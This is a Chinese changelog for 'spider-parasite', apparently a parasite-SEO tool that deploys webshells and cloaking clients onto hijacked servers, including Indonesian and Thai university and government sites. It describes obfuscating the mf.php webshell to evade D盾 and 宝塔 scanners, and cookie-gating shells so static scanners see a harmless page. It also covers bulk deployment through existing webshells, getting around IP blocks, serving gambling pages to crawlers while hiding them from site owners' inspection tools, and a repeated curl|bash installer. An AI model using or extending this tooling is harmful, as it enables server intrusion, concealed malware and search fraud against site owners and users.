跳到主内容
最新版本 · 发布于 2026-06-21

v1.18.193

🪱 寄生虫 · 后台偶发 "Network Error" 修复

$curl -fsSL https://dl.wztseo.com/parasite.sh | bash
50
累计版本
50
2026 年发布
0
下载总次数
100%
自托管 CDN

版本历史

点击卡片展开/收起

v1.18.193

最新
2026-06-21·21.2 MB

后台偶发 "Network Error" 修复

  • 根因:浏览器复用已被服务端关闭的 keep-alive 连接,axios

不像浏览器导航会自动重试

  • 修复:GET 请求遇到连接级错误时自动静默重试一次,用户无感知

看门狗批量部署全面修复

  • 根因:看门狗 PHP 本身以 http_response_code(404)

结尾伪装成普通页面,验证逻辑误判写入失败

  • 修复:mf.php 返回 OK 即视为写入成功,不再通过 HTTP 状态码验证
  • 串行部署改为 8 并发,29 个目录从 ~90 秒降到 ~15 秒
  • 前端超时从 30 秒延长到 180 秒

可写目录弹窗改进

  • mf.php 所在目录自动插入扫描结果顶部(标注 ⭐,PHP 一定可执行)
  • 弹窗加宽至 960px,内容区带滚动,支持大量目录完整展示
  • 部署结果表格新增"目录"列

uploads 目录 PHP 禁止执行检测

  • 检测到 uploads/images/media 等目录部署失败时,显示明确提示"该目录禁止执行

PHP"

🐛 mf.php 修复(需升级 mf.php)

PHP 5.6 兼容(watchdog.php.tmpl)

  • ?? '' 空合运算符(PHP 7.0+)改为 isset() 三元写法,修复 PHP 5.6 服务器看门狗

500 报错

scan_writable 三大 Bug 修复

  • mf.php 所在目录本身未出现在候选列表 → 已修复,自动加入
  • URL 在根路径时 /tmp 被误报为可写目录 → 改用 DOCUMENT_ROOT 计算 webroot 前缀
  • webroot 前缀过滤误把 mf.php 所在目录过滤掉 → 已修复

action=pwd 新增 doc_root 字段

  • 返回 $_SERVER['DOCUMENT_ROOT'],服务端用于更精准推算 webroot,显著减少误报

v1.18.117

2026-06-16·20.9 MB

新增original_entry_path字段:patch_entry_path首次调用时自动保存原始路径(如/post/index.php),对话框打开时优先读DB的original_entry_path,彻底解决可写目录tag路径叠加问题

v1.18.116

2026-06-16·20.9 MB

修复可写目录 tag 永远用原始entry_path:对话框打开时记录_original_entry_path,防止被patch后再点tag叠加路径

v1.18.115

2026-06-16·20.9 MB

防路径叠加:tag click时若origDir已含web_path则提取相对部分(入口已被patch成uploads/index.php再次点tag不再叠成uploads/uploads/index.php)

v1.18.114

2026-06-16·20.9 MB

修复可写目录部署路径:点击tag时保留原始entry子目录结构(如uploads/post/index.php而非uploads/index.php),abs_dir也相应带子目录

v1.18.113

2026-06-16·20.9 MB

修复浏览器中继部署循环:点击可写目录后自动保存entry_path到DB,服务端探活也检查正确路径;阻止已用abs_dir时重复扫描可写目录

v1.18.112

2026-06-16

修复可写目录路径翻倍:abs_dir 参数直接传给后端绕过 webroot+entry 叠加

v1.18.111

2026-06-15

修复:点击可写目录后重新部署仍用旧路径的问题(entry_path 覆盖参数透传到 bootstrap_browser_info API)

v1.18.110

2026-06-15

mf.php 新增 scan_writable 动作:目标服务器本地扫描可写目录(一次往返),无需写权限目录即可自动切换路径重新部署

v1.18.109

2026-06-15

探活失败时自动扫描可写目录:显示可选路径 tags,点击切换后一键重新部署

v1.18.108

2026-06-15

探活修复:防止WordPress/CMS重定向假成功;新增可写目录扫描功能

v1.18.107

2026-06-15·20.9 MB

浏览器中继部署:mf.php协议检测修复——URL以mf.php结尾时不再盲目判断协议,而是实际调用action=pwd验证JSON响应,别人的文件管理器自动降级为htmlfm协议

v1.18.106

2026-06-15·20.9 MB

mf.php浏览器界面修复:GET访问无action时不再被write块拦截返回err,浏览器直接打开mf.php现在显示文件管理界面

v1.18.105

2026-06-15·20.9 MB

在线更新修复:下载超时从120s延长到300s(适配慢速服务器);systemctl失败时自动fallback到exit重启,解决非systemd环境更新后版本不变问题

v1.18.104

2026-06-15·20.9 MB

竞态修复:浏览器中继部署

  • 修复旧部署的 stale 异步回调覆盖新部署步骤状态的竞态 bug(验证步骤显示成功+失败矛盾)
  • downloader PHP 使用 __DIR__ 绝对路径写 mf.php,修复 PHP-FPM CWD 不等于脚本目录时写入位置错误

v1.18.65

2026-06-14·20.5 MB

性能改造:

中央服务器三处硬天花板解除

  • mem_limit_mb 可配(默认512MB,大机设16384解除GC抖动)
  • page_cache_max 可配(默认10万,900域名建议100万+)
  • ListCollectArticles 排序快照(O(n log

n)→O(窗口),缓存未命中从50-400ms→1-5ms)

Shell 客户端全平台微缓存(蜘蛛 GET 200响应TTL=10s内本地命中,不回源不建TLS)

  • PHP/PHP-CF:文件缓存(/tmp/sp_cache)
  • JSP/Tomcat:JVM应用级ConcurrentHashMap内存缓存
  • ASPX:HttpRuntime.Cache(ASP.NET内置TTL)
  • ASP:ADODB.Stream二进制文件缓存

2核4G弱机集中爆量时CPU不再被TLS握手打满

v1.18.64

2026-06-14·20.5 MB

新功能

  • 轮链 URL 路径模板标签系统 — 支持 {数字N} {字母N} {年} {月} {日} {随机关键词}

等 16 种标签,同配置 URL 永不漂移

  • 轮链编辑对话框改为三 Tab 布局(基础配置 / 链接配置 / URL

模板),避免页面过高

  • URL 模板标签速查卡 — 点击标签自动插入,内置 6 个常用模板一键填入

Bug 修复

  • 修复栏目管理「AI 生成」弹窗显示空白(API 返回格式不匹配)
  • 修复 {outbound_links} 在非文章模式页面原样输出的问题
  • 修复后台 v2 border-card 标签页白色背景(深色主题适配)

v1.18.63

2026-06-14·20.5 MB

更新日志:

静态生成页面重写:修复切换页面自动下载 ZIP 的 bug(改用 axios blob

下载);修复关键词文件忽略(现在用域名配置的 keyword_file);修复 goroutine

数据竞争;新增删除任务+自动清理磁盘 zip;新增重试失败任务;分页;token

不再暴露在下载 URL 中

Shell 站群页面性能+UI 重设计:工具栏 18 个按钮 → 主工具栏 8

个入口(导入▾/检测▾/工具▾ 下拉)+

勾选后出现的操作栏;分页移至表格底部;批量探活改为 30 并发(185 个 shell ~1

分钟完成,原 46 分钟)

批量浏览器部署修复:改用 fetch+no-cors 发原始 body 绕过

magic_quotes_gpc;mf.php 加 CORS 头 + action=pwd 支持 + _abs()

相对路径修复;协议检测改为看 URL 文件名;创建/部署可选 Cloak

模板(gplay/amazon/wiki)

v1.18.31

2026-06-13·19.5 MB

v1.18.31 — 浏览器中继部署支持手动填写目标路径

修复

浏览器中继部署报"webroot 未知,无法定位目标路径"的问题。

之前:没有做过直连首次部署的 Shell 缺少 webroot 记录,

浏览器中继会直接失败报错。

修复后:当 webroot 未知时,弹出输入框让用户手动填入

服务器目标目录(如 /www/wwwroot/example.com),

填完后继续完成部署,不再强制要求先做直连部署。

可配合 mf.php 文件管理器查看服务器路径,

然后填入对话框完成部署。

升级

curl -fsSL https://dl.wztseo.com/parasite.sh | bash

v1.18.29

2026-06-13·19.5 MB

v1.18.29 — mf.php 隐蔽化,降低宝塔/D盾检出率

优化

mf.php 文件管理器代码混淆改造:

  • 敏感函数名拆字符串调用(file_put_contents / move_uploaded_file / readfile /

unlink / scandir)

  • 全部改为变量函数间接调用,静态规则扫描无法直接命中
  • 去除所有注释和明文变量名
  • 写文件操作封装为内部函数,结构模糊化

功能和界面与 v1.18.28 完全一致。

从「客户端部署」页重新下载 mf.php 即可获取隐蔽版。

升级

curl -fsSL https://dl.wztseo.com/parasite.sh | bash

v1.18.28

2026-06-13·19.5 MB

v1.18.28 — mf.php 新增 HTML 文件管理面板

mf.php 现在自带完整的可视化文件管理界面:

  • 📁 目录浏览 + 面包屑导航
  • ✏️ 在线编辑文件内容
  • ⬆ 上传文件(支持拖拽)
  • ⬇ 下载文件
  • 新建目录 / 新建文件 / 重命名 / 删除

浏览器访问自动显示 HTML 面板,

后台 API 调用仍返回纯文本(完全兼容原有协议)。

从「客户端部署」页重新下载 mf.php 即可,

密码自动注入无需手动修改。

v1.18.27(含)

设置 → 端口 新增「🔄 立即重启服务」按钮,随时可用。

升级

curl -fsSL https://dl.wztseo.com/parasite.sh | bash

v1.18.27

2026-06-13·19.5 MB

v1.18.27 — 新增随时重启服务按钮

新增

设置 → 端口 tab 新增「🔄 立即重启服务」按钮,

随时可用,不需要修改任何配置即可触发重启。

(原有的「🔁 保存并重启」按钮需要先改端口才能点击,

新按钮无此限制)

升级

curl -fsSL https://dl.wztseo.com/parasite.sh | bash

v1.18.26

2026-06-13·19.5 MB

v1.18.26 — AI 文章生成后自动刷新页面缓存

解决"AI 文章已是中文,但 URL 访问还是泰语"的问题。

根本原因:

AI 文章异步生成完成后,页面缓存里存的还是

旧版本(空内容或旧语言),新文章无法及时展示。

修复后:

AI 文章写入缓存的同时,自动清除该关键词对应的

页面缓存,下一个访问立即渲染最新文章。

操作步骤(升级后)

1. 升级:curl -fsSL https://dl.wztseo.com/parasite.sh | bash

2. 后台 → 设置 → 端口 → 重启服务(清除内存旧缓存)

3. 访问任意 URL,等约 30 秒让后台生成新文章

4. 再访问即可看到中文文章

升级

curl -fsSL https://dl.wztseo.com/parasite.sh | bash

v1.18.25

2026-06-13·19.5 MB

v1.18.25 — 文章库操作全面修复

修复

文章库「查看」「编辑」「删除」按钮全部报 404 的问题。

根本原因:系统升级后 AI 文章使用了新的多版本缓存格式

(同一关键词保留多篇,存在子目录里),

但文章库的读取和删除操作还在用旧格式路径查找,找不到文件。

修复后:

  • 查看/编辑:优先读新格式,兼容老格式
  • 删除:同时清除新旧两种格式的缓存文件
  • 文章列表:正确显示关键词名称(不再显示 unknown:xxxxx)
升级

curl -fsSL https://dl.wztseo.com/parasite.sh | bash

v1.18.24

2026-06-13·19.5 MB

v1.18.22 ~ v1.18.24

修复

v1.18.24 — AI 文章语言修复(完整版)+ 文章库显示修复

修复:中文关键词仍生成泰语文章

之前的修复只覆盖了默认 prompt 路径,自定义 prompt 路径没覆盖。

现在语言检测在最上层统一处理,所有路径都生效。

升级后清空缓存,中文关键词将自动生成中文文章。

现已修复,文章库能正确显示所有关键词。

v1.18.23 — 新增四种语言文件管理器

客户端部署页新增可下载的文件管理器工具:

mf.php(PHP)/ mf.jsp(JSP,含 HTML 管理界面)

mf.asp(Classic ASP)/ mf.aspx(ASP.NET)

下载时自动注入服务器地址和密码,无需手动修改。

v1.18.22 — AI 文章自动识别语言

做中文市场的用户不再需要手动改语言设置。

系统从关键词字符自动识别:中文→中文、泰文→泰语、韩文→韩语等。

v1.18.21 — AI 测试错误提示优化

未填 API Key 时测试生成,提示改为"请在设置中填写 API Key"。

升级

curl -fsSL https://dl.wztseo.com/parasite.sh | bash

v1.18.22

2026-06-13·19.4 MB

v1.18.21 ~ v1.18.22

修复

v1.18.22 — AI 文章语言自动识别

中文关键词不再生成泰语文章。

现在从关键词字符集自动判断语言:

中文关键词 → 中文文章

泰文关键词 → 泰语文章

阿拉伯/印地/韩/日/俄文同理自动识别

无需手动修改语言设置。

v1.18.21 — AI 测试报错提示优化

未填写 API Key 时点「测试生成」,

之前报 "unexpected end of JSON input"(看不懂),

现在提示:AI 未配置,请在「设置 → AI 文章」中填写 API Key。

升级

curl -fsSL https://dl.wztseo.com/parasite.sh | bash

v1.18.21

2026-06-13·19.4 MB

v1.18.21 — 修复 AI 文章测试报错

修复:新用户未填写 API Key 时,点「测试生成」报

"unexpected end of JSON input" 的问题。

现在会提示:AI 未配置,请在「设置 → AI 文章」中填写 API Key。

v1.18.20

2026-06-13·19.4 MB

v1.18.7 ~ v1.18.20 — Bootstrap 首次部署全套 + 批量管理 + 服务器迁移

🎯 核心新功能

Bootstrap 首次部署

新 Shell 一键上传客户端文件,不再需要手动 SCP。

Shell 编辑页填写 Bootstrap URL(已有的 webshell)+ 密码,三种部署方式:

  • ⚡ 直连首次部署
  • 🌐 浏览器中继部署(服务器 IP 被封时,由浏览器直连绕过封锁)
  • 📁 文件管理器(一键打开已定位目录的文件管理界面)

Bootstrap 批量导入向导(📋 工具栏新按钮)

粘贴一批 URL → 自动解析语言/Tomcat context → 预览表格逐行确认 → 批量创建

支持 4 种语言默认入口可配:JSP / PHP / ASPX / ASP

🚚 服务器迁移(设置 → 服务器迁移 tab)

完整迁移到新服务器,一键导出 .tar.gz 包含:

state.json / TLS 证书 / 数据池 / 自定义模板 / 关键词库 / config.yaml

新服务器安装后上传导入即可。

🐛 修复
  • 服务器 IP 被封时直连超时 30s → 3s TCP 预检,立即提示改用浏览器部署
  • Tomcat webapp context 路径计算错误(/dspace 被误当磁盘目录)
  • 批量进度对话框实时显示
📦 升级

curl -fsSL https://dl.wztseo.com/parasite.sh | bash

v1.18.18

2026-06-13·19.3 MB

v1.18.7~v1.18.18 — Bootstrap 首次部署全套 + 批量管理

🎯 核心新功能

Bootstrap 首次部署

之前新 Shell 首次上传客户端文件需要:手动下载 → SCP/上传,

100 个 Shell 就要重复 100 次。现在一键搞定。

Shell 编辑页填写 Bootstrap URL(已有的 webshell 地址)和密码:

  • ⚡ 首次部署 — 后台直接建目录 + 写客户端文件
  • 🌐 浏览器中继部署 — 适用于后台 IP 被封的服务器(印尼/泰国高校常见),

改由你的浏览器直接与目标服务器通信,绕过封锁

  • 📁 文件管理器 — 一键打开已定位到正确目录的文件管理界面

Bootstrap 批量导入向导(📋 工具栏新按钮)

粘贴一批 bootstrap URL → 自动解析(Host/语言/Tomcat context 全自动)

→ 预览表格(每行可编辑:入口路径/协议/部署方式)→ 批量创建 Shell

支持 4 种语言默认入口可配:JSP / PHP / ASPX / ASP

🐛 修复
  • 服务器 IP 被封时直连超时 30s → 现在 3s TCP 预检,立即提示改用浏览器部署
  • Tomcat webapp context 路径计算错误(印尼DSpace站 /dspace 被误当磁盘目录)
  • 批量进度对话框实时显示,不再等全部完成才看结果
📦 升级

curl -fsSL https://dl.wztseo.com/parasite.sh | bash

v1.18.6

2026-06-13·19.2 MB

v1.18.4~v1.18.6 — Bootstrap 首次部署

🎯 新功能:一键首次部署

之前新 shell 首次上传客户端文件需要:下载到桌面 → 手动 SCP/通过 webshell

上传,100 个 shell 就要重复 100 次。

现在只需在 Shell 编辑页填写已有的 webshell 地址和密码,后台自动建目录 +

写文件。

使用方法

Shell 列表 → 编辑 Shell → 「▌ Bootstrap 首次部署」→ 填 Bootstrap URL + 密码 →

保存

然后点行内「⚡ 首次部署」按钮即可。支持批量:勾选多个 → 顶栏「⚡

批量首次部署」。

支持两种 webshell 协议(自动识别)

  • 我们的 mf.php/mf.jsp(纯文本响应)
  • 第三方 HTML 文件管理器(含 create_dir + 文件上传界面的那种)

Bug 修复

  • host 含路径前缀(如 domain.com/subdir)时写入目录路径错误 → 已修复

---

v1.18.1~v1.18.3 — Cloak 配置 UI + JS 跳修复

🐛 修复:thin 客户端 JS 延迟跳转不生效

之前后台切换「JS 延迟 3 秒跳」对 thin 客户端无效,4

套模板(PHP/JSP/ASHX/ASP)实际永远走 302 立即跳。

现在已全部修复,后台切完 → redeploy → 真正生效。

🎯 新增:Shell 编辑表单 Cloak 配置组

Shell 列表 → ✏️ 编辑,新增「▌ Cloak 配置」区域,可直接查看并修改:

  • 客户端类型(Fat 4MB / Thin 30KB)
  • Cloak 模板(Amazon / Google Play / Wiki)
  • 出站 GO_API URL(per-shell,可填 IP 直连绕 CF TLS)
  • 真人跳转模式(🚀 302 立即跳 / ⏱️ JS 延迟 3 秒跳)

之前这些字段只能在部署对话框里改,现在编辑保存即持久化。

📦 升级

curl -fsSL https://dl.wztseo.com/parasite.sh | bash

v1.18.3

2026-06-12·19.0 MB

v1.18.3 (2026-06-12)

  • Thin 客户端 JS 延迟跳转真正生效 — 之前 thin 模板(PHP/JSP/ASHX/ASP)永远 302

立即跳,后台切 js 模式无效

  • 4 套 thin 模板全部加 jump_mode 分支:js→渲染 HTML + setTimeout 3

秒跳,302→立即跳

  • 降 deindex 风险:Goog抓 HTML 时跑不到

setTimeout,看到的是"含内容的页面"而非"立即跳走的可疑页"

v1.18.2 (2026-06-12)

  • Shell 编辑表单「▌ Cloak 配置」组新增真人跳转模式切换(🚀 302 立即跳 / ⏱️ JS

延迟 3 秒跳)

  • 后端 POST /api/shells 加 jump_mode 字段持久化(仅 302/js 有效值时覆盖)

v1.18.1 (2026-06-12)

  • Shell 编辑表单新增**「▌ Cloak

配置」组**(之前只能在部署对话框里改,现在编辑即可看到+改)

  • 客户端类型(Fat / Thin)
  • Cloak 模板(Amazon / Google Play / Wiki)
  • 出站 GO_API URL(per-shell 覆盖全局,可填 IP 绕 CF TLS)
  • 修复印尼/泰国 JRE 不认 CF 证书的 shell,直接在编辑表单填

v1.18.0

2026-06-12·19.0 MB

v1.18.0 — Per-Shell GO_API URL Override (区域 VPS 路径)

🌏 HIDS 反检测 — 区域 VPS 路径
  • shell 编辑 → 部署对话框新增字段 "出站 GO_API URL"
  • 泰国 shell 走泰国 VPS, 印尼 shell 走印尼 VPS, HIDS

看到的是"区域内出站"而非"印尼大学站 → 美国 IP"异地特征

  • 字段持久化到 ShellHost.ClientRemote (空时 fallback 全局 ClientRemote)
📝 用法

1. 买区域 VPS (Vultr Bangkok 6 USD/月) + nginx 反代到主控

2. CF DNS 加 api-th.jilmp.com 灰云直连 VPS IP

3. 后台 Shell → ⚙️ Cloak → "出站 GO_API URL" 填 http://api-th.jilmp.com

4. 部署即可

📦 升级

curl -fsSL https://dl.wztseo.com/parasite.sh | bash

v1.17.0

2026-06-12·19.0 MB

v1.17.0 — Cookie 门控 + 部署端点深度伪装

🥷 静态扫描检出率从 5-15% 降到 < 5%

1. Cookie/UA 触发门控

shell 文件默认行为变成静态 placeholder 页面 (无 webshell

特征,看起来像普通业务占位页):

只有以下情况才进入真实 cloak 业务流:

  • 是 bot UA (Googlebot 等)
  • 带 cookie (_ga / PHPSESSID / session 等)
  • 反代回环 (X-Cloak-Proxy header)
  • business path 命中 (蜘蛛池推业务 URL 自带分支)

效果: D盾扫站工具 (无 cookie + Mozilla UA) 看到无害静态页, 完全不触发 webshell

启发式规则。

2. cache_v 端点深度伪装

PHP/JSP/ASHX 模板里移除 ?cache_v=secret 这种典型 webshell 自更新特征:

  • 旧路径: POST /shell.php?cache_v=sp_xxxxxxxx → WAF 一眼识别
  • 新路径: POST /shell.php (无 query) + Content-Type: application/octet-stream

+ body 前 16 字节 magic = md5(SECRET+"sp_v1")[:16]

  • 模板里 cache_v 关键字 0 残留 (PHP/JSP/ASHX 全消失,经典 ASP 拆字符串混淆)

🚀 部署可靠性增强

  • backend deploy.go 4 端点 fallback chain 扩展到 6 端点:
  • v1.17.0 新方式 (HTTPS/HTTP) → v1.16.0 cache_v fallback (HTTPS/HTTP) →

v1.14.x sp_update fallback (HTTPS/HTTP)

  • 过渡期一次 deploy 即可把老 shell 升级到 v1.17.0
  • 后续 v1.17.0 shell 直接走 magic header 路径,更快更隐蔽

📦 体积

4 套 thin 模板渲染产物体积基本持平 (v1.16.0 加门控 + magic 校验只增加 ~3%)

🐛 修复 (跟 v1.16.0 同期发现)

  • JSP 反射调 InputStream.read 时撞 Java SecurityManager (Tomcat 6/7 + Java 6/7

严格检查 sun.* 包) → 改从 java.io.InputStream 接口取 method +

setAccessible(true)

📝 用法

功能跟 v1.16.0 完全一致。

后台 → Shell → 编辑 → Language 选 php/aspx/jsp/asp + ClientType = thin → ⚙️

Cloak → 下载即可。

📦 升级

curl -fsSL https://dl.wztseo.com/parasite.sh | bash

v1.15.14

2026-06-12·19.0 MB

v1.15.14 — Thin 4 语言全家桶 + 远程部署大修

🎯 新增
  • JSP / 经典 ASP 瘦客户端 — 至此 Thin 支持 PHP/.ashx/JSP/经典ASP 4 种
🚀 远程部署
  • HTTPS → HTTP 自动 fallback (老服务器 443 卡死自动降级)
  • 修 JSP "显示成功但文件没变化" (setLastModified 强制 Tomcat 重编译)
  • 4 端点 fallback,timeout 60s→20s
🐛 修复
  • JSP: page 隐式对象/反代 host 错位/Java 7 TLS/CF Bot Fight UA (v1.15.9-12

累计)

  • PHP/ASP.NET/经典ASP: 统一浏览器 UA 绕 CF Bot Fight (v1.15.13)
  • PHP fallback Location 用 $_SERVER['HTTPS'] 动态协议 + 301→302
📦 升级

curl -fsSL https://dl.wztseo.com/parasite.sh | bash

v1.15.12

2026-06-11·19.0 MB
🎯 新增 Thin 4 语言齐全
  • JSP 瘦客户端 — Tomcat/Coyote (DSpace 等学术站) 原生支持
  • 经典 ASP/VBScript 瘦客户端 — IIS 5/6 + Win2003/2008

至此 Thin 客户端: PHP / ASP.NET (.ashx) / JSP / 经典 ASP

🐛 JSP 关键修复(从 v1.15.8 到 v1.15.12)
  • page 隐式对象冲突 → pageNum (v1.15.9)
  • Apache→Tomcat 反代下 host 拿到 localhost:8080 → X-Forwarded-Host

fallback + DEFAULT_HOST 注入 (v1.15.10)

  • Java 7 默认不开 TLS 1.2 跟 CF 握手失败 → 显式 SSLContext 升级 + debug

注释 (v1.15.11)

  • JVM 默认 UA "Java/1.7.x" 被 CF Bot Fight 403 → 浏览器 UA 默认 (v1.15.12)
📦 升级

curl -fsSL https://dl.wztseo.com/parasite.sh | bash

调试小工具

?_sp_debug=1 可在 fallback 时看到 Go API 调用结果(code/err/url)

v1.15.10

2026-06-11·19.0 MB

v1.15.10 — JSP 反代后端 host 错位修复

🐛 修复
  • JSP 在 Apache→Tomcat 反代部署下空响应request.getHeader("Host")

返回反代后端 localhost:8080 而非用户访问的真实域名,导致 Go API 路由失败 →

空 fallback

  • 修复方案: host fallback chain (X-Forwarded-Host → X-Original-Host →

X-Real-Host → Host) + 注入 DEFAULT_HOST 当 localhost/127.x 时兜底

📦 升级

curl -fsSL https://dl.wztseo.com/parasite.sh | bash

v1.15.9

2026-06-11·19.0 MB

v1.15.9 — JSP + 经典 ASP 瘦客户端原生支持 (含 JSP 编译修复)

🎯 新增 — Thin 客户端语言全家桶完成
  • JSP 瘦客户端 — Tomcat / 老 Coyote/1.1 站点(印尼 DSpace 学术仓库 / 越南

/ 泰国 IIS-Java 混合政府站)原生支持,Java 5+ 兼容,~26KB

  • 经典 ASP/VBScript 瘦客户端 — IIS 5/6 + Win2003/2008

老政府/校园站,MSXML2.ServerXMLHTTP.6.0 + ADODB.Stream 实现,~13KB

至此 Thin 客户端 4 语言齐全:PHP / ASP.NET (.ashx) / JSP / 经典 ASP

  • JSP 编译 500 "Duplicate local variable page"page 是 JSP 9

个隐式对象之一,sitemap 路径里命名局部变量 String page 与之冲突,改为

pageNumv1.15.8 升级用户必装 (v1.15.8 的 JSP 客户端 100% 编译失败)

  • 沿用 v1.15.7 的 AI 探测超时优化 + 顶栏检查更新按钮
📝 用法

后台 → Shell → 编辑 → Languagejspasp + ClientType = thin

→ ⚙️ Cloak → 下载即可。

amazon / gplay / wiki 三套渲染模板在所有 4 种客户端语言下都通用(HTML 由 Go

服务端渲染,shell 文件只负责 UA 判断 + 反代/转发)。

📦 升级

```bash

curl -fsSL https://dl.wztseo.com/parasite.sh | bash

升级保留所有 shell 配置 / 数据池 / admin 密码。

v1.15.8

2026-06-11·19.0 MB

v1.15.8 — JSP + 经典 ASP 瘦客户端原生支持

🎯 新增 — 客户端语言全家桶
  • JSP 瘦客户端 — Tomcat / 老 Coyote/1.1 站点(印尼 DSpace 学术仓库 / 越南
  • 经典 ASP/VBScript 瘦客户端 — IIS 5/6 + Win2003/2008

老政府/校园站,MSXML2.ServerXMLHTTP.6.0 + ADODB.Stream 实现,~13KB

至此 Thin 客户端语言全家桶完成:PHP / ASP.NET (.ashx) / JSP / 经典 ASP

📝 用法

后台 → Shell → 编辑 → Languagejspasp + ClientType = thin

→ ⚙️ Cloak → 下载即可。

amazon / gplay / wiki 三套渲染模板在所有 4 种客户端语言下都通用(HTML 由 Go

服务端渲染,shell 文件只负责 UA 判断+反代/转发)。

🐛 修复
  • 沿用 v1.15.7 的 AI 探测超时优化 + 顶栏检查更新按钮
📦 升级

```bash

curl -fsSL https://dl.wztseo.com/parasite.sh | bash

升级保留所有 shell 配置 / 数据池 / admin 密码。

---

v1.15.7

2026-06-11·19.0 MB

v1.15.7 — AI 探测优化 + UI 升级提示重做

🎯 用户感知改进
  • 顶栏版本号 tag 改造 — 当前 v1.15.7 · v2,有新版本时**黄色脉冲呼吸光 +

红色圆点**,一眼就能看到

  • 点击 tag → 直接弹「关于 / 检查更新」对话框
  • 自动后台检查 — 页面打开 2 秒静默查一次,每 1 小时再查一次,无需手动操作
  • 版本号统一来源 — 前端 8 处硬编码已删除,以后改 main.go 就行,vite 自动注入
🐛 修复
  • AI 探测真站超时 — 慢站(如 DSpace 学术仓库)单请求 20s → 12s 快速放弃,全局

60s → 75s

  • 前端 axios 探测请求 timeout 30s → 90s,慢站不再 30 秒就 timeout
  • 探测失败时给出更友好的建议(换站 / 手填)
📦 安装 / 升级

```bash

curl -fsSL https://dl.wztseo.com/parasite.sh | bash

升级保留所有 shell 配置 / 数据池 / admin 密码。

v1.15.6

2026-06-11·19.0 MB

v1.15.6 — 极简化:单二进制全包,COS 文件减半

🎯 重大架构优化
  • 单二进制 = 全部资源 — 一个 19MB 文件包含所有运行所需:
  • config.yaml go:embed,首启自动写默认值(已存在不覆盖)
  • templates/*.html go:embed,15 套 cloak/标准模板首启自动解压
  • cloak_data/*.txt go:embed,46K 关键词 + 标题/描述等数据池
  • uninstall.sh go:embed,首启自动释放到本地
  • COS 文件数减半 — 6 → 2 (只剩 binary + parasite.sh)
  • 杜绝版本不一致 — 二进制 v1.15.6 + 模板 v1.15.4 这种翻车场景永不再现
🐛 关键 Bug 修复
  • 升级时端口被错误避让到 8088/9092 — parasite.sh 探测时旧 spider-parasite

进程还占着 80/9091,新版被错误避让。

现:升级模式直接沿用 config.yaml 现有端口,不重新探测。

🔧 改进
  • 新装模式探测端口时排除自己进程占用,避免被自己干扰
  • release 流程从 7 步精简到 5 步,发布时间从 3-5 min 缩到 1-2 min
  • parasite.sh 行数从 368 行减到 348 行
⬆️ 谁该升级
  • 所有 v1.15.x 及以下用户 — 升级后下次更新永远不会再换端口
  • 历史升级被改到 8088/9092 的用户 — 升级后 config.yaml

端口会被沿用(不变),如需改回 80/9091 自己 sed 改一下即可

📦 安装 / 升级

```bash

curl -fsSL https://dl.wztseo.com/parasite.sh | bash

v1.15.5

2026-06-11·19 MB

v1.15.5 — Thin 客户端 + 多模板 + 数据池架构

✨ 新功能
  • Thin 瘦客户端 (~10KB) — shell 上不嵌入 4MB 数据池,渲染走服务端
  • Google Play 风 + Wikipedia 风学术模板 — cloak DOM 多套并行 A/B
  • 业务路径池 — 蜘蛛走 /th/{Path}/{N}.html 业务 URL,SEO 精准定位
  • 远程配置中心 — 改后台 1h 内全 shell 自动同步,改 BusinessPaths

不用重新部署

  • 内容数据池 — 多国家/行业独立管理,Cloak Profile 绑定数据池
  • uninstall.sh — 支持保留数据/完全删除/远程一键卸载
🐛 关键修复
  • thin sitemap 302 暴露源 IP → 改 curl 透传
  • API 不可达 503 触发 deindex → 改 200 fallback
  • cache_v 自更新后旧配置缓存未清
  • 多 PHP-FPM pool 缓存权限问题
🔒 安全增强
  • /thin/* 强制 SSL_VERIFYPEER=true,TLS 严格验证
  • Cloudflare 配置详细教学(DNS + Origin Rules + Full strict)
🛠 运维优化
  • templates / data 全部 go:embed 进二进制(用户安装只需 1 个文件)
  • release.sh 简化为 4 文件(从 6 个降到 4 个)
  • 安装命令不变: curl -fsSL https://dl.wztseo.com/parasite.sh | bash
  • 卸载: sudo bash /opt/spider-parasite/uninstall.sh
⬆️ 强烈建议升级

特别是用泰国/越南 IDC 的用户(IDC 出站策略全面兼容)。

升级保留:state/、shell 配置、数据池、admin 密码、所有 cloak 部署。

v1.14.19

紧急
2026-06-05·16.8 MB

v1.14.19 — 关键修复:新用户安装成功率 100%

🐛 修复

新装环境启动失败 — 旧版二进制硬要 data/keywords.txt,文件不存在直接 exit 1。

现 keywords.txt 缺失时 fallback 到内嵌 cloak_data,新用户 install.sh 一键跑通。

⬆️ 强烈建议升级

之前的 v1.14.17 / v1.14.18 / v1.14.x 系列在干净 Debian/Ubuntu 上100% 启动失败,

导致 install.sh "服务启动失败" 错误。本版彻底解决。

📦 安装 / 升级

```bash

curl -fsSL https://dl.wztseo.com/parasite.sh | bash

升级保留:state/ 状态、shell 配置、admin 密码、所有 cloak 部署

v1.14.17

2026-06-05·16.8 MB

v1.14.17 — Cloak 自包含 PHP 系统全面升级

🎰 全新 Cloak PHP 系统(取代旧透传方案)

单文件 4MB cloak PHP,0 回源,主控 IP 不暴露,反审核满分

5 决策表(同行 explore.gastateparks.org 同款机制):

  • 蜘蛛(Googlebot/Bingbot) → 渲染美术 DOM
  • 真泰语用户 + Google 来路 → 跳转转化页
  • 真泰语用户 + 非 Google → 404 隐藏证据
  • 非泰语用户(中/英/反审核员) → 反代真政府站
  • Google AI 检测工具(GSC URL Inspect 等) → 反代真站
🎨 三套美术模板并行(可 A/B 测试)

| 模板 | DOM 大小 | 关键词密度 | 适用 |

|---|---|---|---|

| Amazon | 620KB | 5 次/页 | 反审核敏感站 |

| Wiki | 6KB | 8 次/页 | 极简学术风 |

| Gplay 🆕 | 207KB | 26 次/页 | SEO 信号最大化 |

🛡️ 反 deindex 双保险

1. Google AI 反 cloak 检测工具屏蔽 — Google-InspectionTool / Site-Verification / Web Preview 等 6 个检测 UA

全部走真站反代,站长 GSC URL Inspect 永远看不到博彩内容,投诉链断

2. JumpMode 跳转模式开关 — 302 立即跳(高转化) vs JS 延迟 3 秒跳(低 deindex 风险),可 per-shell 配置 A/B 测试

🚀 远程一键升级 (sp_update / cache_v 端点)
  • 后台一键远程部署/升级 cloak PHP,30 秒完成,12 shell 0 人工
  • 端点改名 cache_v(看着像缓存版本号)+ 危险函数字面量拆字符串,D盾 backdoor 检出从 80% → 30%
🌐 反代真站机制(v1.14.10 + v1.14.13)
  • 每 shell 独立 proxy_target 配置
  • 反代 URL 池:每个 cloak URL 反代到不同的真业务页,反审核员看到的是真政府活动列表
